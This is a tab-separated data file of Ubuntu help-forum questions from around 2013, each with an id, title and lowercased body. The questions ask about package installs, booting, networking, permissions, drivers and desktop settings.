255984	how to install gnome-keyring and gmime	i 'm trying to install balsa email reader on my ubuntu for dev purposes ( i 'm new to linux ) .. and i run into this issue after issuing the ./autogen -- enable-all command : checking wether we have gnome-keyring ... no checking gmime version.. configure : error : gmime 2.6 or 2.4 not detected i already ran apt-get install libgmime-2.6-0 and i get libgmime-2.6-0 is already the newest version so i 'm confused.. update : ok it seems that i have gnome-keyring installed.. but then i 'm trying to install gmime from sources.. i did the traditional ./configure and make.. but then i run into this issue : error : unknown type name 'gpgme_decrypt_result_t ' any ideas ?
255987	how to upgrade or use ubuntu 12.04.2	sorry for the silly question . but i currently have ubuntu 12.10 . this is because i have an ivy bridge processor and at the time it had the kernel version that supported ivy bridge without freezing/hanging constantly . but i always wanted 12.04 lts . my question is : if i was to completely re-intsall the os ( which i want to do ) and install 12.04.2 , how do i do that ? i understand that 12.04.2 is out today but when i downloaded it from the ubuntu main page i only get 12.04.1 is there any way to get 12.04.2 stable ( not daily build ) directly ? or at least upgrade 12.04.1 to 12.04.2 ? i 've only found guides on 12.04 - > 12.10 many thanks !
255988	virtualization , guest network settings error	i have the following situation , i have a virtualization environment , the host is ubuntu host information : uname -a linux asic 2.6.32-38-generic # 83-ubuntu smp wed jan 4 11:12:07 utc 2012 x86_64 gnu/linux mii-tool eth0 : negotiated 1000baset-fd flow-control , link ok eth1 : negotiated 1000baset-fd flow-control , link ok eth2 : no link eth3 : no link and when executing ethtool command also works perfectly , guests information : uname -a linux questa.silminds.com 2.6.18-128.el5 # 1 smp wed dec 17 11:41:38 est 2008 x86_64 x86_64 x86_64 gnu/linux mii-tool siocgmiiphy on 'eth0 ' failed : operation not supported no mii interfaces found ethtool settings for eth0 : no data available and when i try to set the network card interface settings using ethtool -s etho speed 1000 duplex full can not get current device settings : no such device not setting speed not setting duplex some details : host is ubuntu 10.04 lts kvm version is version 0.12.3 ( qemu-kvm-0.12.3 )
255989	unable to install unity revamped ( ppa : ikarosdev/unity-revamped )	i intend to use a forked version of unity ( ppa : ikarosdev/unity-revamped ) over the original one . the problem i 'm facing is that the forked version is 5.18.0-0ubuntu1 and the original one is 5.18.0-0ubuntu2 . i do : sudo apt-add-repository ppa : ikarosdev/unity-revamped sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade the ppa is added successfully . the output from the last two commands is : jon @ lemur : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . jon @ lemur : ~ $ sudo apt-get dist-upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . apparently nothing got updated . i rebooted and the unity launcher minimize-on-click functionality was n't there . i found unable to install unity revamped , and followed the accepted answer . i already had the check in 'pre-released updates ( precise-proposed ) ' removed . any help ? edit 1 : smartboyhw suggested this : sudo apt-get install unity=5.18.0-0ubuntu1 but it only resulted in : jon @ lemur : ~ $ sudo apt-get install unity=5.18.0-0ubuntu1 [ sudo ] password for jon : reading package lists ... done building dependency tree reading state information ... done e : version '5.18.0-0ubuntu1 ' for 'unity ' was not found which is a bit weird , as y-ppa ( a ppa management app that i have installed ) tells me that the package '5.18.0-0ubuntu1 ' is indeed in my ikarosdev/unity-revamped ppa . edit 2 : gertvdijk requested output from apt-cache policy unity : jon @ lemur : ~ $ apt-cache policy unity unity : installed : 5.18.0-0ubuntu2 candidate : 5.18.0-0ubuntu2 version table : *** 5.18.0-0ubuntu2 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 100 /var/lib/dpkg/status 5.18.0-0ubuntu1+ikarosdev1 0 500 http : //ppa.launchpad.net/ikarosdev/unity-revamped/ubuntu/ precise/main amd64 packages 5.10.0-0ubuntu6 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages i am on ubuntu 12.04 links https : //launchpad.net/~ikarosdev/+archive/unity-revamped https : //launchpad.net/ubuntu/precise/+source/unity/5.18.0-0ubuntu1
255992	is privacy an issue while searching in the dash ?	i have hear that user 's ip addresses and search terms can be shared with amazon , facebook , vimeo and others services , is it true ?
255993	making a terminal command 'permanent '	i would like to make ubuntu `` remember '' the following command line ( for trackpad to work ) : xinput set-prop `` cypress apa trackpad ( cyapa ) '' `` synaptics finger '' 15 20 256 is there a way to make this permanent , so i dont have to type it in every time i start the computer ? cheers ! luke
255999	eclipse is not starting	i have downloaded eclipse indigo 64bit tar file and extracted it , for my ubuntu 12.04 , i have jdk 1.7 installed in my system , when i am doing : java -version bash : /home/rd00/development/jdk1.7.0/bin/java : can not execute binary file and echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /home/rd00/development/jdk1.7.0/bin is showing , but when i am clicking on eclipse it is not starting , i have given my jdk path in eclipse.ini also , but no use , need help . srikanth
256008	uefi booting problem	i have hp envy 6 1002tx . i updated it to windows 8 and now i 'm having trouble installing ubuntu 12.10 . i 'm not really new to linux or ubuntu . as suggested https : //help.ubuntu.com/community/uefi , i 've tried it and it still does n't boot . in that `` identifying if the computer boots the cd in efi mode '' , i can confirm that my usb boots in efi mode . secure boot is disabled and my laptop has insyde 's bios . i tried boot repair twice and as mentioned , here is the the pastebin link http : //paste.ubuntu.com/1650182/ . although it says i have windows 8 installed in the mbr of /dev/sda , i remember wiping windows 8 fully . currently i have only one os and that is ubuntu 12.10 . ( i still regret paying $ 15 for win 8 upgrade ) . i have tried searching for the same question or solution but have n't been able to . after i use boot-repair and it says boot .efi file from sda7/ & i do so in bios and this is what i get . error : disk` , msdos5 ' not found grub rescue > _
256012	no sound via hdmi and i can not use mirror display on a lenovo g560	had some trouble since switching from win to ubuntu yesterday . when i connect my pc through hdmi to my tv the sound does n't work . the video is there ( expanded desktop ) but the sound is still coming from the pc . i want to be able to mirror the display and guess this could solve the problem . but when i try the tv gets no display , just black , and no signal . anyone know in what direction to push me ? do n't want to back to win , but with no way to watch movies on the tv it 's heading that way ... it 's an integrated intel vid card .
256013	could not reliably determine the server 's fully qualified domain name ?	when i restart my apache server using the command sudo /etc/init.d/apache2 restart i get the following error : restarting web server apache2 apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername ... waiting apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 for servername is the server using 127.0.1.1 instead of 127.0.0.1 ? what causes this error ?
256015	realtek alc887-vd popping sound xbmc	i have the following hardware : asus e45m1-m pro based htpc , yamaha rx-v550 , lg 50pa6500 . connections : sound : htpc- > yamaha via s/pdif optical , video : htpc- > lg tv via hdmi . and software : ubuntu 12.10 minimal server ( so x64 ) 3.6.3-030603-generic kernel installed , xbmc frodo more or less following this method . i experience strange , annoying sound `` pops '' while watching a movie . specially if there are loud effects . stereo , 5.1 , dd , dts , dts hd , so the failure exists by every format . i tried to remove the alsa-base , no luck . i had asus at3iont-i deluxe with just the same alc887 chip , and with 12.04 x86 xbmc eden i had no problems at all . funny is that regarding asus homepage the e45 board has an anti-pop function . : ) lspci pastebin every help and suggestion would be appreciated ! thanks , best regards
256020	how can i stop the automatic creation of ~/.cache/motd.legal-displayed file ?	in every home-directory on my ubuntu server is a .cache folder containing an empty file motd.legal-displayed . is there a way to stop creating these .cache folders ?
256022	window 8 installation with already using dual boot window 7 and ubuntu	i am already using windows7 and ubuntu as a dual boot with easybcd software . now i have a another seperate drive for windows 8 installation . ( i try to directly installation in different drive but when pc is restart only window 7 and 8 is showing , no option for ubuntu ) tell me the best way to install win 8 and also keep together with ubuntu and win 7 .
256024	adding ram was recognized by bios but not by ubuntu	on a motherboard that allows max 8gb ram , 2 slots x 4 , 4 of them pre-installed , i added another 4gb in the second slot ; bios reads 8gb available , but the system info shows only 2.9 gb ram . how can i increase the used limit to 8gb ? system specifications : - ubuntu 11.10 intel® core™ i3-2330m cpu @ 2.20ghz × 4 os 32-bit uname -a linux tatcho 3.0.0-14-generic # 23-ubuntu smp mon nov 21 20:34:47 utc 2011 i686 i686 i386 gnu/linux
256025	initialize script on startup	is it possible to initialize a script upon startup in ubuntu ( precisely , ubuntu server 12.10 ) ? i need to initialize a script to let the network card work , and so far i could n't find a way to do so ( the initializing on startup part ) .
256029	unexpected anwer from the following regex ?	i have this following file : - $ cat numbers a1 12 12345 123456 19816282 1 @ $ % 6 i am using grep `` ^ [ 0-9 ] \ { 1,6\ } $ '' numbers which is giving me the following results : - 12 12345 i was expecting 1 @ $ % 6 also in the results . please correct me if i am wrong ?
256033	how do you rebuild and apply a portion of the kernel ?	i was following the steps here to build my own kernel , which worked great , then i wanted to make a small tweak to the setup file ( /arch/x86/kernel/setup.c ) and rebuild it to see my message printed in the dmesg log . before i clean and build again , is there a way to avoid the delay this will have ? can i just rebuild a portion of the kernel that i changed or do i really have to clean/rebuild the entire thing ?
256034	ubuntu 12.10 lock-screen unlockable with old ldap password	i have an ldap server that serves ubuntu clients and there is a problem when unlocking the screen after a user has changed their password . initial login works as expected : the user can log in with the new password and can not with the old one . however the user is able to unlock the lock-screen with both the new and the old passwords . how can i fix this ? thanks .
256039	ubuntu-studio plug-ins gui broken in ardour	i use ubuntu-studio 12.10 and here 's my problem : when i insert a plug-in on a track , i got a broken interface . i can use most of them without their respective interfaces , but most complex like eq10q are pain to use without its interface . the gui is broken with all plug-in use in ardour and packed with ubuntu-studio 12.10 . the real problem is that with former version of ubuntu-studio , plug-ins interfaces were working fine . i 've tried ubuntu-studio 12.10 on different computers , and the same ! . but the most strange thing is that plug-ins gui works with other plugin-host softwares like lv2-rack . here 's screen-shots of the same plug-in but run in different hosts : lv2-rack : http : //imageshack.us/a/img547/7214/plughost.png ardour : http : //imageshack.us/a/img850/4365/ardourhost.png i do n't know if it 's a problem of dependencies or settings , but i hope that someone in the ubuntu community knows the solution ! thanks by advance !
256046	flash without adobe : some youtube videos play , most do n't	when i installed 12.04 i also added ubuntu-restricted-extras . i decided to try accessing flash content in firefox without the adobe plugin , and i wanted to experiment with streaming video directly with vlc , so i removed flashplugin-installer . i thought everything was still working on youtube when the first video played flawlessly , but it seems to be hit-and-miss ; i 'm not sure why some play while the rest give me the `` adobe flash player required for video playback '' message . those that do load look better and allow a smoother browsing experience . my firefox plugins can i get videos to play consistently without the adobe plugin ?
256051	ca n't copy/cut/paste into my external harddrive	i have a 1 tb external hard drive and i ca n't write anything on there . i have some movies on there and i can watch them perfectly fine but i can copy new files to there , it 's just grayed out . i have tried : sudo chmod 777 -f -r /media/jeggy/intenso but that did n't work , any help would be great jeggy @ jeggy-xps : ~ $ mount | grep intenso /dev/sdb1 on /media/jeggy/intenso type vfat ( rw , nosuid , nodev , uid=1000 , gid=1000 , shortname=mixed , dmask=0077 , utf8=1 , showexec , flush , uhelper=udisks2 ) jeggy @ jeggy-xps : ~ $ ls -l /media/jeggy/intenso ls : can not access /media/jeggy/intenso/lampp : input/output error total 128 drwx -- -- -- 10 jeggy jeggy 32768 jan 2 23:11 b drwx -- -- -- 5 jeggy jeggy 32768 feb 12 23:31 b2 drwx -- -- -- 131 jeggy jeggy 32768 feb 13 00:33 filmar drwx -- -- -- 3 jeggy jeggy 32768 des 26 16:29 jebster d ? ? ? ? ? ? ? ? ? ? ? ? ? ? lampp this is what i get and after i followed the instructions by luis alvarado and now `` new folder '' is n't grayed out but i get this when trying to create one : leyp um = skip and the lampp folder is a folder i thought i lost yesterday , so if there 's anyway i can get that folder back , it would be very great as there is some php codes i have been working on and maybe my last chance of ever getting them back . update : jeggy @ jeggy-xps : ~ $ fsck /media/jeggy/intenso fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) fsck.ext2 : is a directory while trying to open /media/jeggy/intenso the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > jeggy @ jeggy-xps : ~ $ sudo fsck.vfat -r /dev/sdb1 dosfsck 3.0.13 , 30 jun 2012 , fat32 , lfn file system has 30516268 clusters but only space for 30516222 fat entries . jeggy @ jeggy-xps : ~ $ sudo fsck.vfat -r -u /media/jeggy/intenso/lampp /dev/sdb1 dosfsck 3.0.13 , 30 jun 2012 , fat32 , lfn file system has 30516268 clusters but only space for 30516222 fat entries . and still nothing works : (
256059	online accounts , email , and spotify ca n't connect or authenticate ( 12.10 )	i have set my proxy settings and applied them system wide . i can access the internet and get my email etc . though firefox ( and chrome ) , but whenever i try an app that needs to access the internet , it says i need to check my password . i tried the fix listed here as well as here to make sure my proxy settings are being recognized by all the applications , but neither of them made a difference . there was also talk of this being a possible bug as listed here but it is listed as `` fix released . '' edit : more info- whenever i try to run one of these programs i end up getting this error message ( this is specifically the one from everpad ) : traceback ( most recent call last ) : file `` /usr/lib/pymodules/python2.7/everpad/provider/sync.py '' , line 361 , in run self.init_network ( ) file `` /usr/lib/pymodules/python2.7/everpad/provider/sync.py '' , line 377 , in init_network self.note_store = get_note_store ( self.auth_token ) file `` /usr/lib/pymodules/python2.7/everpad/provider/tools.py '' , line 51 , in get_note_store http_proxy=get_proxy_config ( urlparse ( user_store_uri ) .scheme ) ) file `` /usr/lib/pymodules/python2.7/thrift/transport/thttpclient.py '' , line 72 , in init raise valueerror ( `` unsupported proxy scheme , % s '' % http_proxy.scheme ) valueerror : unsupported proxy scheme , https does anyone know what i can do ? or let me know if i need to run some tests etc . to get you some more information .
256067	my additional usb keyboard has strange behaviour when using the windows key	the usb keyboard that i have connected to my dell e6430 running ubunthu 12.04 with gnome 3 does not open the activites overlay when i press the `` windows key '' on the usb keyboard . it works just fine when i use the laptop keyboard . i used ~ $ sudo /lib/udev/keymap -i to find what the key code was and in both cases ( laptop and external keyboard ) it is leftmeta . but when i go and configure keyboard shortcuts the leftmeta on the laptop keyboard shows up as mod2+super l and from the external usb keyboard it is favorites .
256068	firewall ufw is `` enable and active '' but gufw is off	question concerning the ufw firewall : sudo ufw enable returns firewall is active and enabled on system startup sounds fine , but when i start gufw after reboot , it is still off what does that mean ? the gui is off and the firewall is running ? ( i know ufw is the command line to set iptables )
256069	how to install and use a enfora edg1228 ?	i have a old usb modem enfora edg1228 and i had tried to communicate with it using minicom , cutecom , gtkterm , etc but it does n't respond . it works perfectly in windows xp x86 . when i list the usb devices it appears like this : bus 004 device 002 : id 10c4:8053 cygnal integrated products , inc. and in the /dev directory : crwxrwxrwx 1 root dialout 188 , 0 feb 14 11:02 ttyusb0 comm parameters are : 460800 8n1 file /proc/tty/driver/usbserial : usbserinfo:1.0 driver:2.0 0 : module : cp210x name : '' cp210x '' vendor:10c4 product:8053 num_ports:1 port:1 path : usb-0000:00:1d.2-2 i would like to implement this to develop a sms/web app using at commands . any ideas ?
256070	startup disk creator error `` unable to mount blank dvd-r disc location is already mounted ''	my os is ubuntu 12.10 32 bit desktop . ( pentium ( r ) dual-core cpu e6500 @ 2.93ghz ă 2 ) . when trying to burn the lubuntu-12.10-desktop-i386.iso file on a blank dvd-r disc , using the startup disk creator , i get this error : unable to mount blank dvd-r disc location is already mounted . i have never encountered such problem before . what is wrong and how to correct it ?
256072	how can i block a specific wireless network using the terminal	i am trying to block a specific wireless network such as `` router_home '' because everytime i wake up my laptop the first thing that the network manager does is to try connecting to this network . can you show me how to do that using the terminal or/and gui ? edit : i know i can uncheck the `` connect automatically '' option . but i want to know how to block a wireless network totally . i am using ubuntu 12.10
256075	weird output when running `` dpkg -l linux-image '' ( 12.04 lts )	when i run `` $ dpkg -l linux-image '' i get : desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-==============-==============-============================================ un linux-image < none > ( no description available ) what does it mean ? i 've been paranoid that my ubuntu install thinks it 's up to date when it 's not , due to flaky wifi connection at work when i was installing it ... but can anyone explain to me what the output of that command means ? i wan na be able to troubleshoot things like this ( assuming it is an actual problem ) in the future . thanks in advance .
256078	converting a windows drive to ubuntu drive	i am recent convert to ubuntu and just loving it . right now , i can access my windows drive from ubuntu , however , i want to delete the windows partition and make it an ubuntu partition . i have already backed up my data . how do i go about it .
256080	why does compiz crash ? ( ubuntu 12.10 under virtualbox )	i am using a fujitsu lh531 laptop with windows 7 . i tried installing ubuntu 12.10 using virtual box . after installation , when i reboot for the first time , it shows the login screen . but after logging in , there is nothing , then an error message saying compiz has closed unexpectedly and therefor the desktop is unusable . i have reinstalled many times , but every single time it happens.. i have searched the forums , topics , discussions , questions.. and i suspect it has something to do with my nvidia card . details : ubuntu 12.10 virtualbox 4.2.6 windows 7 can anyone help ? i do n't need nvidia graphics , i just want to use ubuntu normally .
256085	execute custom bash script with sudo without passwd prompt	i run ubuntu-12.04 desktop x86_64 . i have a simple script that needs to be accessible from the desktop and run as root : $ cat ~/desktop/flash.sh # ! /bin/bash - cd ~/tools sudo ~/tools/fastboot-hw.sh i 've read how to run sudo command with no password and sudoers simple explanation and safely execute custom script-parts as sudo ( on serverfault ) also . i modified my /etc/sudoers as follows : $ sudo cat sudoers defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # user privilege specification root all= ( all : all ) all root all= ( all ) nopasswd : /home/john/desktop/flash.sh john all= ( all ) nopasswd : /home/john/desktop/flash.sh root all= ( all ) nopasswd : /home/john/tools/fastboot-hw.sh john all= ( all ) nopasswd : /home/john/tools/fastboot-hw-sh my sudo-capable user is john . he is member of group : john adm cdrom sudo dip plugdev lpadmin sambashare my scripts are fully executable : $ ls -al ~/desktop/ -rwxr-xr-x 1 john john 129 feb 13 17:16 flash.sh $ ls -al ~/tools/ -rwxrwxr-x 1 john john 17251 feb 13 17:15 fastboot-hw.sh when double-clicking on flash.sh icon on my desktop , and selecting `` run in terminal '' , system still prompts for a passwd . john 's passwd is not empty , i 'd like to keep it not empty . i also tried to push my 2 scripts to /usr/local/bin and adapt /etc/sudoers accordingly , but no luck . what i missed must be really obvious , but i can not find it .
256086	wifi connection is constantly lost	i have ubuntu 12.10 on my laptop . for some reason - i do n't exactly know which one - my wifi module does n't work . so , i bought an external wifi module asus usb-n13 . i 've installed all required drivers , but i still have to run this command on every system startup to make this adapter work : sudo modprobe -r b43 ssb wl brcmfmac brcmsmac bcma if i do n't run this command in the network utility at the top of the desktop i see that wifi is disabled by hardware switch . so , i run this command to make adapter work . and here 's the question : after some time ( may be 5-10 mins ) connection is lost . i still can see all wifi networks enabled , but when i try to connect back to my home network password window appeared . when i enter my password windows disappears and in a minute it appears again . the password i 'm enter is surely right . so , i have to unplug usb adapter and plug it again and after it wifi start works in normal mode for 5 or 10 mins and after it everything is back . any ideas how i could solve my problem ? thanks in advance .
256090	why do i get `` authentication failure '' ?	i recently installed ubuntu 12.10 . as i started the terminal and ran the command su which we usually use to perform root operations and to get the # symbol . after running the command it asks me to enter password , i entered the password which ubuntu had asked me during installation . i entered the password many times , but it gives me a message authentication failure what should i do ? ? ?
256091	who is ubuntu-etherpad and why did they take ownership of my bzr branch ?	i created a project in bazaar : # - on effex - desktop cd ~/proj bzr init-repo cups-pdf bzr branch ubuntu : precise/cups-pdf precise bzr branch ubuntu : quantal/cups-pdf quantal bzr branch ubuntu : raring/cups-pdf raring bzr init cups-pdf-zel gedit notebook.txt ( and some notes ) bzr add . bzr commit -m 'update notes' i then pushed it once to the my ppa junk folder : bzr push lp : ~/+junk/cup-pdf this worked great , aside from the typo i made typing cup-pdf instead of cups-pdf . i was able to go to launchpad and look at the branch . http : //bazaar.launchpad.net/~lantzr/+junk/cup-pdf-zel/ the configuration inside the ~proj/cups-pdf/cups-pdf-zel/.bzr folder still shows the same basic target .bzr/branch/branch.conf push_location = bzr+ssh : //bazaar.launchpad.net/~lantzr/+junk/cup-pdf-zel/ i was able to access the ppa from my laptop . # sapphire - laptop bzr checkout http : //bazaar.launchpad.net/~lantzr/+junk/cup-pdf-zel/ i made a trivial change to the note , then committed and pushed up the changes bzr push please note that i did not check via the web interface at this time and then ... the next day my package has moved . it is now owned by ubuntu-etherpad though i am listed as both registered and as a subscriber . the configuration inside the .bzr folder on my laptop ( sapphire ) shows a bound location to the etherpad url .bzr/branch/branch.conf on sapphire bound_location = bzr+ssh : //bazaar.launchpad.net/~ubuntu-etherpad/+junk/cup-pdf-zel/ bound=true who is ubuntu-etherpad and why did they take ownership of my ppa ?
256092	what im clients support jabber and show notifications on the toolbar in ubuntu 12.10 ?	i 'm migrating from macos x back to ubuntu , and trying to find an im client i can use . i use im quite a bit for work , so i really need to see notifications in the toolbar at the top of the screen . when i previously used ubuntu , pidgin was my go-to im client , and it 's also the one recommended by my company - and it is what i have set up now - however the fact that it does n't support notifications in the top window is an issue for me . i 've already missed one message from my boss because of the lack of notifications ! unfortunately empathy does n't seem to work with the custom jabber server my work operates - some people i talked to said that there was a known incompatibility between the two , and no plans to fix it on either side . are there other im clients that are well integrated into ubuntu and will show a notification in the title bar ? alternatively , if anyone knows of a trick to get pidgin notifications working , that 'd be great - based on the googling i did , it sounds like a known issue that people are working on , but i was n't able to find a target date for the fix .
256095	does vncviewer require x locally ?	does vncviewer require an x server to work ? i have installed ubuntu server 12.04 , as well as the xtightvncviewer package . when running vncviewer , it claims that it can not find the display .
256106	how can i disable elantech touchpad while typing on ubuntu 12.10 ?	i have an asus laptop ( non zenbook ) which i purchased last week . it has an elantech touchpad on it . here 's what 's working : edge scrolling or two finger scrolling . three finger and two finger . left click and right click and double tap . the only thing keeping this from being perfect is that when i 'm typing sometimes my palm hits the touchpad just right and then things get crazy . that can be a real bother when writing code . can someone help ? here 's the output of xinput list : virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ etps/2 elantech touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ sleep button id=8 [ slave keyboard ( 3 ) ] ↳ asus usb2.0 webcam id=9 [ slave keyboard ( 3 ) ] ↳ asus wmi hotkeys id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] output of : ps aux | grep syndaemon jason 2911 0.0 0.0 20208 948 ? s feb13 0:53 syndaemon -i 2.0 -k -r -t jason 10256 0.0 0.0 13584 928 pts/2 s+ 14:18 0:00 grep syndaemon
256107	how can i remove leftover bits of kde-standard ?	i 've been looking into different desktop environments , so i decided i 'd give kde a try instead of the normal unity . i installed kde through : sudo apt-get install kde-standard re-logged and everything went fine booted into kde and had a look around . after a while , i wanted to uninstall it so i executed : sudo apt-get remove -- purge kde-standard then sudo apt-get autoremove but the default log in screen is still kde.. and i can still boot into it . also , the laptop does n't even shutdown anymore , as soon as the computer seems to power off it just turns back on.. i am puzzled and would be grateful for help .
256113	why `` failed to download repository information '' when i try to install flash ?	i want to install flash player . but it only shows : failed to download repository information . how can i install adobe flash player ? anonymous @ anonymous-945gcm-s2l : ~ $ sudo apt-get install flashplugin-installer [ sudo ] password for anonymous : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package flashplugin-installer
256120	is firefox going to support h264 tag on ubuntu ?	firefox will soon support the video tag h264 on windows . will there be a solution on ubuntu ?
256123	how do i install the new gns3 release ?	the gns3 package in ubuntu software center is old . i tried to install the new release gns3 0.8.4 rc2 from the cli using the following command : sudo python gns3 0.8.4 exe ( and bin ) but i get a python error . i have updated python and still get the same error . the gns installation instructions ar for using the ubuntu software xenter for the installation but the newer releases are not found when i search for them . the releases are on my disk drive . how can i install the packages ?
256125	lyx does n't work ( ca n't find cls files )	i installed lyx in my system , but it i just ca n't make it work . every time i open any file , i get a message similar to this one : the selected document class article requires external files that are not available . the document class can still be used , but the document can not be compiled until the following prerequisites are installed : article.cls see section 3.1.2.2 ( class availability ) of the user 's guide for more information . i 'm not sure if the problem is with lyx itself or some of its latex dependencies . i do have the `` article.cls '' file in my system ( from texlive-latex-base ) located in : /usr/share/texlive/texmf-dist/tex/latex/base/article.cls ( this line shows up in tools â tex information , so apparently lyx knows about it ) . i have already tried reinstalling texlive and using tools â reconfigure , did n't work . i 'm using lyx 2.0.5.1 in kubuntu 12.10 . edit : apparently this is a bug in 12.10 . i just reverted to 12.04 and everything is working smoothly again , with no setup needed beyond apt-get install lyx .
256126	studio audio mixing software for ubuntu	any software for audio files mixing like mixmeister does ? manual ordering volume and low-mid-hi adjusting levels able to export to .mp3 file bpm 's track adjust vst effects , per track desirable ( and the last but less important ) save session for future modifications note : currently , due to my computer capabilities , there 's no option for a virtual machine
256133	why does ufw seem to slow down wordpress ?	i have a speedy install of wordpress going on ubuntu 12.04 . everytime i enable the ufw firewall , things can get really slow . sometimes fast , sometimes slow , intermittently . logging on through ssh takes an extra 30 seconds , then it 's fast . logging into wordpress admin takes an extra minute . i enabled a http rule , is there some other rule i can set that 'll still allow http connections and run wordpress scripts really fast ?
256134	problem understanding file permissions	i have a problem understanding some aspects of file permissions . the situation is this : i created a directory as /to using sudo and then changed it 's permissions to drwxrwsr-x . i also changed the group for the directory to `` xxx '' which exists on my system . i am a member in good standing of group `` xxx '' . my understanding is that i should be able to create files and directories in /to since i am a member of group `` xxx '' . however when i run the following command i get permission denied when trying to create each file and directory in /to . cp -r from/* /to what am i not understanding about this situation ? i can obviously fix this particular instance with sudo or by changing the owner , but i want to understand the principles . command output jgossage @ hector : ~ $ cp -r downloads/* /downloads cp : can not create directory /downloads/eclipse ' : permission denied cp : can not create regular file /downloads/google-chrome-stable_current_amd64.deb ' : permission denied cp : can not create directory /downloads/kindle ' : permission denied cp : can not create directory /downloads/windowsdlls ' : permission denied # target directory information jgossage @ hector : ~ $ ls -al /downloads total 8 drwxrwsr-x 2 root admins 4096 feb 13 07:16 . drwxr-xr-x 28 root root 4096 feb 14 08:23 .. jgossage @ hector : ~ $
256135	ubuntu 12.10 on bootable thumbdrive black screen	so i 'm trying to run ubuntu 12.10 from a bootable thumbstick . i can see a purple screen with icons at the bottom and it proceeds to display string after string of lines . after that , i hear drums but nothing else on the screen pops up . smashing on the keyboard makes more drums play . nice musical program you guys got going here . what do i do to make this work ?
256137	change launcher icon opacity/brightness	is there any way to reduce the opacity/brightness of launcher icons in ubuntu 12 ? they are too vivid and colorful , which distracts me a little . coders will know . it would n't bother me if the launcher was at the bottom or on the right , but it 's not possible to move the launcher since version 12 . reducing the icons ' saturation could help a lot too .
256138	why am i unable to ping the same interface after configuring an ipv6 address	i setup ipv6 in my ubuntu 12.04 on eth0 using command ifconfig eth0 inet6 add 2001 : db8 : fedc : cdef : :1/64 but when i try to ping eth0 itself using ping6 2001 : db8 : fedc : cdef : :1 it always gives ping 2001 : db8 : fedc : cdef:0:0:0:1 ( 2001 : db8 : fedc : cdef : :1 ) 56 data bytes from : :1 icmp_seq=1 destination unreachable : address unreachable from : :1 icmp_seq=2 destination unreachable : address unreachable from : :1 icmp_seq=3 destination unreachable : address unreachable i think that it automatically is pinging from : :1 to `2001 : db8 : fedc : cdef : :1 command ip addr show dev eth0 it gives 2 : eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc mq state down qlen 1000 link/ether 00:1b:38 : a1 : a2:50 brd ff : ff : ff : ff : ff : ff inet6 2001 : db8 : fedc : cdef : :1/64 scope global tentative valid_lft forever preferred_lft forever command ip -6 route it gives 2001 : db8 : fedc : cdef : :/64 dev eth0 proto kernel metric 256 fe80 : :/64 dev eth0 proto kernel metric 256 command ip6tables -l it gives chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination command ip6tables -f it gives nothing . please help how to solve this . this may have clue for someone command ip -6 route get 2001 : db8 : fedc : cdef : :1 gives 2001 : db8 : fedc : cdef : :1 from : : via 2001 : db8 : fedc : cdef : :1 dev eth0 src : :1 metric 0 cache why it has src : :1 ?
256139	laptop does n't boot after installing 12.10	i have recently installed ubuntu 12.10 alongside windows 7 . now when i turn my laptop on the lights come on and then nothing . i press the power button again and then it 's ok. before ubuntu was installed it did n't do this .
256144	installing ubuntu on hp envy4-1030us	i am having an issue i ca n't quite get around . i just got a new hp envy4-1030us with windows 7 on it , and the first thing i did was upgrade to windows 8 . so now i 'm trying to partition the 500gb drive and install ubuntu , but when i get into the installer there are no drives to install it to . also , palimpsest thinks the drive is formatted in fat , when windows is telling me that it 's ntfs . any ideas ? there are only two partitions , the windows 8 one , and the `` system reserved '' .
256145	do i need to remove the 32 bit version of steam beta before upgrading to the final version of steam ?	ok , just want to figure this out . i have ubuntu 12.04.1 64 bit , and have installed the steam beta which was only 32 bit . now that is available in the software centre and now as 64 bit , i just want to find how how to get it . will i have to remove/purge my beta install , then install from the software centre ? or do i just do a software update and it will be updated ? figure this would be a good question to ask . thank you for your time and answers .
256155	will i lose all of my data if i replace windows with ubuntu ?	i wish to install ubuntu over windows . windows is installed on my `` c '' partition . i also have another partition which contains 95 % of my data . i really would like to know if i install ubuntu , will it delete all of my data on `` d '' partition ? or will it only overwrite on `` c '' ? my goal is to install ubuntu on `` c '' and keep all of my `` d '' partition data .
256156	how to make left ctrl as super on ubuntu 12.10 ?	is there was a way to map the left ctrl as super on ubuntu 12.10 . the keyboard layout app does n't seem to have this option .
